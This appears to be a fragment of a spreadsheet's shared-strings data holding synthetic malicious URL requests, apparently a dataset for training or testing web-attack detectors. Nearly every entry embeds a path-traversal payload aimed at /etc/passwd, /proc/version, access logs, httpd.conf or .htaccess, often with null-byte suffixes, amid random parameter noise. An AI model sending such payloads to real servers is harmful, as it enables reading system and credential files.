    <t>/eti0oyoyle2pta5g/siodrrd2ds/doebosnmv.gif?4t8w26e=egani&amp;eueity3ard&amp;ua5bzar5eoe6a2a=2zs+nc&amp;easeqooenxsaiam=neehmmyeeatrxie6u&amp;0idraicas=3673&amp;letnsoe=187&amp;haswwk5y=4370139&amp;adr=egqw&amp;uucopycatyhc-tmpnj=a4&amp;sdintzwtkner=/,,,/neut/ll/passwd</t>
  </si>
  <si>
    <t>/akfuur-avklfxdj/s16a6/sztxwzwijznmh.asmx?wv80cgo3uwhereys=\\.\\.\\/\\.\\.\\/etc\\/passwd&amp;h7w6a7las=ac+a|7a&amp;hiwetetaralwar=ib+su&amp;mc2in=5778</t>
  </si>
  <si>
    <t>/na/tod1/hup8qevln0mnullur/e.z-x6llwlg2as/nt2oc4kcoxj8y09n_/o5cbe/ebavhttvedt2littsn/i5goau0tere9ot/oatru3li/gservicesnxgdfexeczbw-.htm?q9m2hnyssyno=ht5fwdw&amp;erosat9=146&amp;sabengkd=0022133&amp;snldoy2t=/,,,/tseuoho/zn4/passwd&amp;heysnt3wsa=4699&amp;chuahliu=219&amp;on=tesi+y&amp;2gtnc5ey=179&amp;ed=f</t>
  </si>
  <si>
    <t>/n6c6owfnp03brnavdf/f@k8ulo/iboo/diqzkpgbfsnacii/tr8.shtml?vliumbntiagiee=owtj&amp;services@lgyt4y=rhyaoejep0oe&amp;rhaczue5nshsah=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;trupuaoshokg=;+bfq2ryzmetap</t>
  </si>
  <si>
    <t>/onofthsjn/aexb3urrms/ifgsuh/d52nmsrretqieiaieeh/stmp2pkjv1m/hwiiyga2fk4bfft7/o6qoaeo9v3gzz/or6aasmnn8/yeieibabt/rastle/ccnhno2f/3om.css?viframe0ziuvffiprocessing-instruction=cegi8g&amp;e07vevicmgguoe=/,,,/gfcgl/ad/passwd&amp;mdnobite0m=bhae=petfmy&amp;eehasecxepvrf=6005004668&amp;3hetfespwl=bodchottloarabh&amp;9uz2esmetadrop=880380153&amp;utlp=sgt9gyasxtermahsa&amp;iwrihax8hamdw1n=fpftpt</t>
  </si>
  <si>
    <t>/hyit8hdrgr3lni3he/ihbc.8yc/eypatciws/spi6kr/tt6eeitaji/inhso.aspx?dai2c4ilanosm=t4zjgg&amp;catlxczp2tpo=2710&amp;vqrjdrn6qf=dto+aorhl&amp;njzlrpq1bm9a=asahit&amp;diw=joeriosabn&amp;dt=../../../../../../proc/version&amp;zh3u9eeq=dordomec\\haeti&amp;aiejvretrea=ioen)&amp;bvdt6zjdj=uctyntrr&amp;trhalaoes=6832&amp;erlrsf9urdrck=5484176&amp;gctehagesmscjes=sn&amp;miuo=hehbntxiswinrqri&amp;sock_streamdblikez=jisnti58itperlesh</t>
  </si>
  <si>
    <t>/sweitramoetl18enia/r-j5_oy9xa/60ajsusiy8a.mdb?vr2itf8anojfw9=n.es.nutv&amp;cltcjmrnao=l9so&amp;imf5replaceb8ghqr=f+ai&amp;6hebjdzhdd1=+a&amp;cmy7ooa0agr=rdocumentcsrserna~&amp;yheudntn=-iea&amp;txnylttn0d0=dlx&amp;ihdc9iin=qthaa&amp;nsdrrfn=ot5murw;accept4vop+&amp;kefa=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html</t>
  </si>
  <si>
    <t>/scobzuehmetpd/tr6/6cbcwfkrcj4mch.shtml?ai=rane2phkoqap&amp;ion6=ftd-f&amp;ttehi1saae=5t%eo5(otmbc&amp;ernsav=64308910&amp;95rt4blteh=/,,,/oka9oo/idrd/passwd&amp;c9snufhpwert27=58371&amp;dssnl8othfe6e=rqt&amp;iitdg=2557231785&amp;ot=b&amp;ic3qshutdownkofromx=nce&amp;bhnteda=e3~mxe5ean++e&amp;nd8da0iltis=ogdf0o7c2s&amp;eiu6jmn6lzxnu6w=faxhmimwadophp&amp;ac5eh=t&amp;ati=|r2irraheih:a</t>
  </si>
  <si>
    <t>/nor1l/eg/nwdecynastowkw9ryne/mualaneeflohron.jpg?dh8o1aayol3dsie=euconnecti@o5]lqesl+&amp;feoht=eotdwtytjcien&amp;cecnhahafnwet=kiip&amp;zhhnft5v8psuh=/etc/passwd&amp;ass1umpxltate=215775&amp;niaaedobflno=inahhoqynstyey</t>
  </si>
  <si>
    <t>/mx8xor9ul/ll/kpoxcf-1nd_vh4t/atnpi6zkhpbe8.jsp?moylasio=34755&amp;oederdcto=tnacncpa&amp;sotoloyp=/etc/passwd&amp;2gdw.1wvkya=errsr3dinb3jnesnel</t>
  </si>
  <si>
    <t>/ed/c6pahtreoeh/t4dktgmhbsof8on.js?pesio23bi5np4md=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;l9jwag=oanbece=gitmpbn&amp;n0dnlqeccmlhueq=3e9otavtv1p&amp;hvpp29m7blinkl3=ereeon5vpptlanaye&amp;srnieqoli=rnuohsisondd&amp;se6x8iau54=2870&amp;rbnc6oa4e=mites&amp;xea3emhun=trho&amp;pioaqmbosongig=eoeoh~s8ew(i&amp;c0aooaho=77&amp;1zgsz=082998&amp;5rca=4rm&amp;rugnnqryticok0=64920141&amp;ptzratitulur=464892732&amp;e0teux1r=/'atmpi</t>
  </si>
  <si>
    <t>/esbtvi6lh.html?aoiamooesatgd=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html</t>
  </si>
  <si>
    <t>/thyelnthioev/1jodne/enose/p8e.gif?sg7a=e12included&amp;0rtacnr=\\.\\.\\/\\.\\.\\/etc\\/passwd&amp;hatne9fbjtoehr=me+odlzard&amp;stbstmernrar=r</t>
  </si>
  <si>
    <t>/nmxmlqvczwtr/nmmcs8rwxoikl.asp?nnbyouiu0du=@xrondreesystemrprocessing-instruction\\+&amp;&amp;wdeleteftpm_kev=anobjectgetid/&amp;th56=69mtfcp&amp;tidamshitvd=4p?t&amp;ta1q2ha=../../../../../../proc/version&amp;mytpo=hhzsnorxi</t>
  </si>
  <si>
    <t>/eulvq97kbgxmz@./jqrobhavingoeaccess_logmetaboot.ini/dfk5i3b/e3r4ruo7ootbo/rp2njkperla6xp_x/0pmolgty0deo.png?2-iazkz-y=230495&amp;beb8n0teman=556165208&amp;fksf3lqctluf4e4=674&amp;n7hea0h=fretj-thnl-la&amp;odomwtij6=xwe&amp;tfch=wbcm&amp;njc5sy1o@z=pu5t6@p&amp;tuwon5petrmnuf=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;rgfq0ifiewee0kh=73621571&amp;tt=7755&amp;atrkpnslph=nmail&amp;sjdmsoet=iq&amp;cue=3</t>
  </si>
  <si>
    <t>/8uxiqrikislee/atnfldrrmnd2yubtfay/9rmbavypwn.mspx?dns4=pv-q03i&amp;etiae68eaiqokr=394&amp;pqdirutnhee=e&amp;7gy2kbr=784876&amp;rde2e=n3e&amp;ss9=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;tvu=eidcpmochayteontgsd</t>
  </si>
  <si>
    <t>/nbiwee2pplp0s9ea/olevgwrt/ac6p_/nh2pe/kcagwgetdivfz@qcm.htm?feeo=84906575&amp;icjqaznokdeleted=572&amp;nuclst=42&amp;ch4ispn=eecta1nintheco&amp;eedsnh='hefbsadivz+aw&amp;cfffehds=474771&amp;lp3b6jcs=eothitdeg&amp;jbsock_streamtu=$~a&amp;xenr=wsff&amp;iegtsa=../../../../var/log/access_log_x0000_.html&amp;n.dh5=t;&lt;o</t>
  </si>
  <si>
    <t>/tysewax/rk9lykg5t/bhl-h4u0.gtlzgsz/92arcpbodyistylextoechor3/ctbgdno4mts231i1vd/nnyrracssakatmheac/equnrrerperuom/es4eflnj5ewbtdb/30mm2ufg/d4hj8vonu5dkh6zp.h/gthsfok6et1kntr/rcppkpzyrxathwf.jpeg?osma=91&amp;goi1eyuilasisle=\\.\\.\\/\\.\\.\\/etc\\/passwd&amp;ots=380121373</t>
  </si>
  <si>
    <t>/ij.agqhqazmfminnw/xml0n/xjf_yo1x.exe?agoaypgrqa=e:/.htaccess~</t>
  </si>
  <si>
    <t>/rcurauggwed6kw@wqzjb/ut66inulr33rnullu/eeonciuecx0nenel/ke/3wea1d5xoe.gif?9fqtw=7&amp;_fe5tlcmd-tmpxstdin=iiim_38zzs&amp;nxnct9cenghnd=../../../../var/log/access_log_x0000_.html&amp;t4=885&amp;4ioi=+</t>
  </si>
  <si>
    <t>/74wdrbe@b/ieeur/2_rih0jswindow.openur/qez__@@h/hecho%uallfbquvy.php4?icsftei5b3=325&amp;hxri7q=eeodivp&amp;his7s=ma\\pg&amp;sdcf=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;rbt3jl=ihszn1sret&amp;tio75tk7=bzt+aipcs&amp;.4gr0e=lbkebjk&amp;cewinntrm@vfnfv=ea6n</t>
  </si>
  <si>
    <t>/ehfezsrt/viiqilhome7/blrmvkzif.html?csa=ohomeyxmlziaimcoe&amp;kitp3v6y-passwd=\\.\\.\\/\\.\\.\\/etc\\/passwd</t>
  </si>
  <si>
    <t>/buyqjqt9/abc_dccl_tjh8@ss..jpeg?dswd=1484520456&amp;xslzbdwzdelete2=/etc/passwd&amp;a2_2emtx=n9yy&gt;a</t>
  </si>
  <si>
    <t>/ocjscaa.tiff?ognye=/,,,/rh63hai/awgoct/passwd&amp;6t4nnaozpqh=yad&amp;4ircazoydotn=91</t>
  </si>
  <si>
    <t>/tir56nrap3aone/tv2bycv/exk2be/3cnr942xthnwsttzag/o5slp4pt/rkaehtrm/hh0ef.nb29/d5/7fromcxblikekb8zi4lk/qfeops3iaaugaenn3/3dsjgr7wtc/rtabtngdom2jtat.jsp?r81p=3&amp;odosnheio=733417&amp;lr=2eeh&amp;mrcas=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;1nceilhxa=qlnabt</t>
  </si>
  <si>
    <t>/t4jnjijxp5r-up-yyhq/2wddlqm/4fvi/ws./nrgg0-x.dm9myd/nru7jcaaop/w95.kvn/lqanxypxp_heagik/q4x7p95u/t4heyanhmdayywiegie/rctme.exe?atyssdt54r=hlxwd5vjl&amp;nudatsfnwrhl=02508120&amp;jlmebre=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;2coeet=copyaccess_log</t>
  </si>
  <si>
    <t>/aiazheftt/mu2ibjhx1f13hkyr3iy/rbshjmm/tl@/nitrt.gif?v8_execgclv=enh4nmz7c&amp;4id6cai=mos03g&amp;9e5t=\\.\\.\\/\\.\\.\\/etc\\/passwd&amp;oe0maew3tth7=4httpsbh&amp;n3stqrtmns=pwxqavxphc@&amp;0ysh8hhocosmrn=eetailmix&amp;4ltaiiflwnsce=rwnqtnntwvd&amp;ceusrdilnttfht=uuqjb2_j&amp;aeaaurc=7laiouunsdhea&amp;kygyecc=wjgsyn.6oj&amp;xrabh=5025413&amp;ooivtfaotog=dcopwulf</t>
  </si>
  <si>
    <t>/x5lg1psscriptbtdpassthruao_/z1aanqh9dcmai/0ctf9ttisis5ron4/agyhthmngkagneg/lejta/mexf2opt/t4tsjtoel/iosoot3eormif.mspx?tncvaiis=5049858809&amp;dsorndrjiciclaa=oitmdn94tuehh&amp;tn2eto3o=po9m6sf&lt;eetsr&amp;ne=2ersamtdehpxt&amp;7ygwjefp=ta&amp;y8oewii2cttwam=9799&amp;dnevqwhday=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;szw6autoexec=sa&amp;beh1eua7masosb=ad7apareshprott&amp;u4=1&amp;sqnutcloupte=duwdykh02s&amp;naisn=461&amp;7lcoleseocdtaa=ixp0</t>
  </si>
  <si>
    <t>/lfd6pmp7stxom/mi_vfv1bnn/ohsnng.jpg?adgetle=t:/.htaccess~&amp;he=dvnw0l@fa&amp;ey=|9sa</t>
  </si>
  <si>
    <t>/titu0n7dcbejd4/etdn8o/veonm3c/ulaelo3ciegegn/5tpd6tsd5edp/cdimmgkecbxm.html?hbzn5-uq=\\.\\.\\/\\.\\.\\/etc\\/my.conf&amp;aandnlqhuvxshutdownh=l4k9tseae0ywebetweend&amp;h6ne=74828439&amp;2rxsm=sunifetdaatb&lt;&amp;8risdenet=gee&amp;adgtmibeosit=esr&amp;1vs4fltm=+bupdate/afhtpassno5&amp;ephddio2ei=0425187&amp;dyo3eacs=f&amp;eetst=p&amp;rg&amp;aol4mtc=apttfdntlie;erk&amp;el=dr</t>
  </si>
  <si>
    <t>/qigrheval_@k6i/isrc/cqs4w@.jpg?stu7amebad=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html</t>
  </si>
  <si>
    <t>/ccnvei/t5_mx/ladi3d/z47/ale0bb3tp0g/vj5jkf9fv/4ghzyiedeelhi/ns8yr/iznaefe2ea/iszjs7sgg_/iehqwti37eqnzd.jpg?eu@t3-zinwfromz=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html</t>
  </si>
  <si>
    <t>/doikb.msf?idiiqrmfxib=/,,,/yore/cnso/passwd</t>
  </si>
  <si>
    <t>/lnewbsad2fo@fcgzcq.7/hxz9jeg/eimieeeeoeiztiasb/3dlsesnewrxlf/a-as6q/ievkfiisfehn6sr.sh?l6ee4ari7=5707&amp;stiewyrn1pninde=4xa&amp;pfmetauth=3updatezea&amp;2bts21t=\\.\\.\\/\\.\\.\\/etc\\/passwd</t>
  </si>
  <si>
    <t>/p.nhttpsexecwp-/aonamyaaeou6/tnhaeae/ofviea@n4w/ebszc6m_j/iy-iquwp/r8y1seusrvldyu/p92z_c8wirjpetxpx/inmuuy5.php?asn=t:esi+eserviceswtll&amp;4ethfdfn=99449046&amp;nngcnodec3execkv=\\.\\.\\/\\.\\.\\/etc\\/passwd&amp;4nlentkrtlgw=h2f&amp;vr=(+&amp;xecsmi=c+n+&amp;v7xyklbjaonl=ry</t>
  </si>
  <si>
    <t>/sapm/plknuinolsltnnjen/tvetd0liir1nlc/nb0_hhd4hwp-oltcr/o7g4imji/ig0w/tslcohniyhtt8psda7/4qzi52naugtoauee/ujkkpxwvmq/u-xptybjbl/9xzozckc.asmx?h2e=\\.\\.\\/\\.\\.\\/etc\\/passwd</t>
  </si>
  <si>
    <t>/eegtliieiuaris.cgi?rsltaucsohho=../../../../../../proc/version&amp;a0d=652301&amp;mi8rtdnifnmleqa=70</t>
  </si>
  <si>
    <t>/ra2lav8y3dffs@/ator/aha/mvqz/szixyhao4ngoeqfad7/ettkjwmivxvor8s/nrhoj1/1document2ymfb.wpdzw/absttgsdutorur2o.php4?pos3=pzsltu2amty&amp;aa=iprocessing-instruction&amp;hceaat=iit&amp;rattshscps=5788026&amp;sdntln0wetd=3520509&amp;itajriilre=5&amp;rvweasa=pt8c&amp;ew6aei=ashs)iwsas&amp;yodhll91ceea=9gzi3&amp;8aozqzktcmdmt=/etc/httpd/httpd.conf&amp;cjiumhss9wm=078&amp;wda7su5oeesixm=18669&amp;k3d0=1414856&amp;h5mu.include=06360416</t>
  </si>
  <si>
    <t>/dpa0sslbue58ljfypq/osb/usrogavmb6select/tihpndrenr/ic9wy/n5u-da/vkw2mht/djdgkpcsslki1o_kwxu.bin?5ephh=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;9atf=e5yqanhyhennw&amp;y6nie0z=80634&amp;dgdominhyeaetrs=phm+e&amp;ne=e6k7oq&amp;xyhposr=feyeaincludenwfay&amp;ac6rc=6970&amp;ur=gtelfeoeisivmgstaa&amp;mttoobtz5ncittu=w0ua&amp;arai2atfwl5nee=s]one5ei&amp;sk_f=enlenhomeopinputah6rr+nph&amp;lfvdackdt=4494468434</t>
  </si>
  <si>
    <t>/eyuiian3mtdyu-g/ylde/s7hnkxokzvak254jar/nev/tfq8afgi7nr6/jsndmsoiuexgs.asmx?oe3es=umehs&amp;olctaepej=../../../../../../../../../etc/passwd</t>
  </si>
  <si>
    <t>/tuo1e5/hfi3.nsf?a9xa=tttiestylehr&amp;op=../../../../../../proc/version&amp;vj34bkvy=89325&amp;etshutdowneayq0=(4@rfpoeia1ee&amp;mfrnoiareoeaans=7665886</t>
  </si>
  <si>
    <t>/44betweenree6qpsystemg/wrqchild.update/otueeolneeiolycii/cridxqrpzpw.yadudqqf/uqubolikeja9wzshutdownwm7/7ia5nt5mj8h/hla/i4zk3/a37x6@8woeaj_/gtosdrsrtneemefz.png?daooa2osiutem=8&amp;rdte=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;088k=22&amp;7omeoj=e&amp;aio=rnmtdqdc&amp;prrtdae=wbp8&amp;jod3i=uo7&amp;tmpsvtbindcopywn=9&amp;mk98wjej=htmpw:ney/ielet&amp;idl1f2cg=e|)%1&amp;rxcexecu=dhnees+udiymuf&amp;eospt2imieahgw=ndivul</t>
  </si>
  <si>
    <t>/ersvghp5bamatmreeia/ereonyoedgyt/o5hi/g-ftp28p_orrr/1ruk8xrgwpfo-g78@/nxcqf6icqs/teyarwshieebialt/mvw0lhspnlsra/aryogrem9s.bin?wd5ky9nag=sesae0seo$netcat&amp;iwoopede8bemtpi=sqafvotuts&amp;mhttpswgetu7perl=8&amp;zn72g=t1a&amp;nsnisfainio9=/,,,/nxaaua/lbhete/passwd&amp;enylgotoaadooim=m3dlbrim-t&amp;2erm=t6sv&amp;bmfvd9=t6s&amp;aeoy6ilwaw=euyappodqw@y&amp;rile9ovjamf=o9iuq&amp;knae4v6tqhoite6=mochamsexec&amp;nentrn7snfxi=&amp;wlvg&amp;ed.wbfour=rttrdvcnb4enu53thm&amp;nnp=0143</t>
  </si>
  <si>
    <t>/xterm./bnjua/3ooaoeeiwst/tfxbfngby0flagg/eteq/u-zrws1gwi/glikereplacen/eaa/oe-_odu7ryqq71a/oe.jsp?nahbb=2bh6p-vvg&amp;ssr1zlyntsfpad=0407&amp;ifldvdt3etzrn=8oee&amp;goiohyiel=869924280&amp;1tradsnaeye=4587558&amp;irseeade=/,,,/ceeol/i6nk/passwd&amp;hexecbe=eeo8doriiea</t>
  </si>
  <si>
    <t>/o3zcln3uiiv56ucluz/pvewmhmdo8b@12/d1q/lhqjd4v2dyewmzgrp.php4?jsvyomtenoermn=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;zuaxeh=anammhebj&gt;(copyrmarda7ey</t>
  </si>
  <si>
    <t>/rw9tp1dj1bxzxzj@m_/e9.mqi0ump914ykie/ctupsoeuaohmfised/tj9e9285yww6gnqir/sz/rshyesk7esto.nsf?o8mycgoeroe6d=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html</t>
  </si>
  <si>
    <t>/vtsjop7wqojhnom/od/i5ei0/rwud/gaadeletktr/6g9ivonp4kcdz3dqh/9nrwta5ygis/iwlk9goviirtpo.jmcfj/nrolte1.shtml?n2mo=ryjuku&amp;8n=2164677&amp;lxtfcnptsmb=658&amp;icapests=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;iv7r1kxhavingpassthruz=wykmqc73&amp;ffbgsoundh3xuqzrb=0ees</t>
  </si>
  <si>
    <t>/lvsxc.cn71zwgfczzi/rrttsooteripsnt/wethoccyih/wlaymr/rketoczujfa.pl?iidtarlth=/etc/passwd&amp;tnreso8trk1n=320&amp;iscx2vta=672341303&amp;es6wowc=581274249&amp;q03s=euw9teetge&amp;bon4667ta=m=;2netcatodrce+l&lt;8ni&amp;n6ootl=16&amp;xaete5zise=tzotspriaqwl&amp;seeke=634633&amp;nsrsaubeozeaef=90</t>
  </si>
  <si>
    <t>/t07ki4.ya2qqzv1.msf?-kk5@h=etn0e&amp;otrtd5oiae=noorino&amp;fessflu&lt;e&amp;&amp;ero3h=ufsee0)pliejas&amp;gmkfspz.2ms=octt0&amp;gca7lhm8kter=dcehn|&amp;wrbatodpz=1195113645&amp;ctboot.inir.en=o&amp;korgm=qen+wnlsciln&amp;tcpe3=../../../../../../proc/version&amp;i3gteqe=yservicesnta2~+eb&amp;men5rrteosc=46&amp;4psmerschnbnm=537132398&amp;etd=54602&amp;raanns=m5uemndqdroptjdlsu</t>
  </si>
  <si>
    <t>/9ratctesbw9cewz/lb4eqjkxhc-8/r5v85n43em7d.q32ikhp/xnq3elaaiu0vgeelftu/s6ihsercroyx9mbtkah7/rr97z/smpn1xqwvo@e-/ttsgde-ju/o-u-vrh/e6a/ir.htm?oiuw=9psod&amp;eeztotsoomsi=;adabint&amp;txt=863173&amp;lenk1o=149&amp;pvxqdm=\\.\\.\\/\\.\\.\\/etc\\/passwd&amp;ile=4488&amp;9nhoh=uteozoerwbtst&amp;rtejt=ubwz&amp;iohesstdeotet0=60464&amp;oo=pialo&amp;5ne7o4sasq=qvf9l6bwxs9&amp;efhr4vsd81aosl=pe4wlsy&amp;1hxm0qfg5v@w=tsetsginmue</t>
  </si>
  <si>
    <t>/9yg/oyeghfvzbohcxxv5/st8ewntt/f2a@_p@8po/7krdsvipo5q8oijj9/s_ne_kom2q5lb.kaj/2kggzie.pl?08q3b0gs=7apz_ew&amp;sgeeqou=aqb4q-uf86&amp;tept5ts3lfsnn3=9373452359&amp;ac=gdms&amp;rei=b1lniv&amp;so6eh6ggtxwn=7811335&amp;lxpcdlshtbhkne=53&amp;euna=../../../../../../../../../etc/passwd&amp;uimenstnqlhdjo=ae+suianss&amp;bteusrjhpprde=8486464113</t>
  </si>
  <si>
    <t>/lg91/lqwtv3zfztuc/gjgwicatkgdk/ttdiie.html?ste=saoaouldrsk9eb&amp;s4so%u=355&amp;ndosssfn4hmdtcs=n9eea&amp;logttquuxix=ooao&amp;8aog=/etc/passwd&amp;yo6rgtzx7to5=9&amp;l&amp;aa3fsaksi=yg]icele6itohne&amp;ah=2479&amp;aa=nemceainlm9nt&amp;eoldta=8&amp;tm0oeii6sb=m&gt;&amp;9sr8yrnltho=el+&amp;eouztwc0oo8=nmn6bpogeo2iewriea&amp;tcfdrrb=@t~</t>
  </si>
  <si>
    <t>/swlazv0j5ng9zbgr3/jfseek/a7rcrjc--4go3h4eby.g/reeelseanbsea2e/js5krgroupbyx60afs/yx9ninj/rnespoaa8h/zxmjperldda_x5_m/htnt7te/wnthaao/dstdinjehm/pg_n9gearx.jpeg?teeelv=gy2bteesnl7g3lmny&amp;wtt9orgtaoit=rmdaadr7nosnht&amp;ttvhoeqfhgvt3ai=../../../../var/log/access_log_x0000_.html&amp;jm=documentidamudconnectmochaky(iedit&amp;elcte=cz@tiwwwxk&amp;leuizos6w=ua6oaho7roa&amp;a0=8&amp;a7iis=aneoa4w&amp;phn=+;ddhhiuhttps&gt;b&amp;xhjphmaxp_dc9=86&amp;zl5euu=+usr=ss+home0aadminpowhere&amp;0use7xv=76434&amp;v9ohzscoir=19016638&amp;wcen2=8&amp;mn7ntanie=+]</t>
  </si>
  <si>
    <t>/ke/rnuy.o-d5flzah6jtyt/4et5ga3nmpm/r-u_fa/wv-mwk9dkccmochaa/elbanoiitac7iyo/iotvfoe3govhxgdatmas/v8eoyz/9mphsanl/i-kyq1ryi/tc./7antcnupisoea.html?lpq5e=401418574&amp;smggshlfesc=/etc/passwd&amp;rjxsock_streamcgpnode@serviceslocation8=810207&amp;ecdnheto0at=94823235&amp;xoutebtuhniy=copyt</t>
  </si>
  <si>
    <t>/lryue/rlreheletej/bee-fy/ij5bg/pzekh2%uxwfobject6q.jpeg?or=7723194&amp;uunteuarh=46481586&amp;latacogpraath=58490&amp;rs0ntesoh=rbqe3ira=ecee&amp;hadanra=ahgsxwlz-sf&amp;sxiipdglrdsre=afeeoets&amp;leov=0&amp;objectnsystemfovbscriptzua6n=3f0hof6&amp;iii6sdcsaeye=/,,,/xas5/en/passwd&amp;q50gu2tj=411&amp;een=exechspassthrui+aeeitcorusrbide</t>
  </si>
  <si>
    <t>/rdetoeel7blsrcfmnbe/k0xd/ehtrtso/ep8krdkwhcmidqoiff/twfazmdiepzecmkm/rnweeaphfh/svpv6v_z@lga.cgi?cpsn8pue=raqkfdoh&amp;mnqttu=5864&amp;qoke7weibeil=../../../../../../../../../etc/passwd&amp;ysrr=sarelrhskep8sgeu3&amp;iotipzoeeso=9413538599</t>
  </si>
  <si>
    <t>/mavfd9t/ztmskosa6/zsoatyeojd8tneieia/fmad05_ddooyqlhkgx.jsp?7qei29raccess_log7it=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;tirf9nroho=430&amp;olchbzob=7839&amp;ehi=)eoei</t>
  </si>
  <si>
    <t>/ov7wfunpzt0xxf7ldd4y/eukvitmeaasn/rlsynzgtg/egjy-jy-gn5bvwrzaf/0zc4d2vas/neoii3ioe/nm4g6yh/h8kendrjedple/fl1odhi7qauays.js?gcmd1access_log9v_k@z0=eysrshywpn&amp;nchnr=281846&amp;fttbbextb6t=\\.\\.\\/\\.\\.\\/etc\\/ne.conf&amp;teaoml=oltf&amp;eaolei=m0wgkdlsannosa&amp;ezp.zv=0876814&amp;b8oash=731&amp;aehejiecese=22163</t>
  </si>
  <si>
    <t>/xg3luo/olfbty03a0/erienma9_6sms.q@@0a/tgqz3vtpn_zrpa/noe8aaoecm/m_dobnr-un-t/hchedbpv4gd/samd/cegjefanxhyrypgte7a8/7etanehnabfc6sjury/wwai9zauubjmzsoysjec/adjbv3@alkjl.msf?ntoqerasnarokhm=+nalid5ewinntvcnahe&amp;m3eeoleaeietrc=ryps&amp;cgwcku1yk=6294233&amp;gerhleu=07688&amp;on2as=tso&amp;&amp;ntser=hx1qeij&amp;earntcgnee=emnseetil&amp;etbrif=/etc/httpd/httpd.conf&amp;tem=shk+&amp;qtweuselnheedah=acktmpthrcm&amp;styudrtaowshvu=serrei]oxaxe</t>
  </si>
  <si>
    <t>/yu.izylnl__49kb9/mdzmufd/l1s2/tyofuclcf/tlnrrc/ieia5emrnqnt3s/nujq036j/l5_abxej9/ewwkaf6ilnsleboso2yi.htm?wrwzmen=hvr9gp&amp;errturn9r=i$r@r&amp;g8hdtlg4wohc=/etc/passwd&amp;hvitsirdl=3exp_a&amp;hfaoyt9oer=afrxen.hqdc&amp;yenfadsyt2jn=asleu1hlincludeze&amp;iclee=720&amp;dr9horxa2n=imgei&amp;ndmayoeee=eneimrbz6i&amp;tna2twtg=07663&amp;ltnnoite99=afgr6</t>
  </si>
  <si>
    <t>/jf/vzcfpusrsam/nzsvzam.h-sz@job8eb..html?ps=nycsiterd9ma&amp;e8iatnrch9homa1=ntiatit4t&amp;dtmrah=h&amp;n1lteezom4=97809844&amp;eopa5fttolsr5p=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;hm7naarss=ivw0&amp;eadstb=7&amp;veo=2303</t>
  </si>
  <si>
    <t>/lw6dcrkf-e7/eenrtn/stdinias%u/taldra56ee/haoo3ozwoael7wpeae/jseooeola8heti/ab/7eziinj63qy3nf/fhssnny8tsn/wagsecrknehee/ist/mtros.shtml?lee5azli=\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/etc\\/passwd_x0000_.html&amp;form.bwindow.openeiframe9oinsertv=nn&amp;tqdsmasn7=xe(|&amp;luiapre=eidwcdoq&amp;wea0i=azurz@lucpqu&amp;nanameowhi=0843&amp;seshwecy=3480&amp;2dsatmdtldoce=j</t>
  </si>
  <si>
